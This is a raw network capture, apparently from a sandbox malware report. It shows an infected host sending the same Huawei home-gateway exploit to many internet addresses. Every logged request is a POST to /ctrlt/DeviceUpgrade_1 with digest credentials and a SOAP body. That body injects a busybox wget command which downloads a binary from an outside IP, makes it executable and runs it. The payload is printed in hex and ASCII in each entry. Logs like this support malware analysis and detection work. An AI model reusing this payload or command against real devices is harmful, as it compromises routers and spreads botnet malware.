                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              166192.168.2.155246631.197.13.10937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.037930965 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              167192.168.2.1550494121.24.77.22137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.037930965 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              168192.168.2.153311841.84.84.24537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038028002 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              169192.168.2.1546008197.43.254.737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038028955 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              170192.168.2.1534752157.65.189.4137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038043976 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              171192.168.2.1536718181.118.204.12037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038043976 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              172192.168.2.1541052138.58.204.13537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038089037 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              173192.168.2.1547924121.231.5.11237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038106918 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              174192.168.2.1549658222.49.11.22737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038106918 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              175192.168.2.155411231.187.11.6437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038160086 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              176192.168.2.155625674.53.15.16437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038204908 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
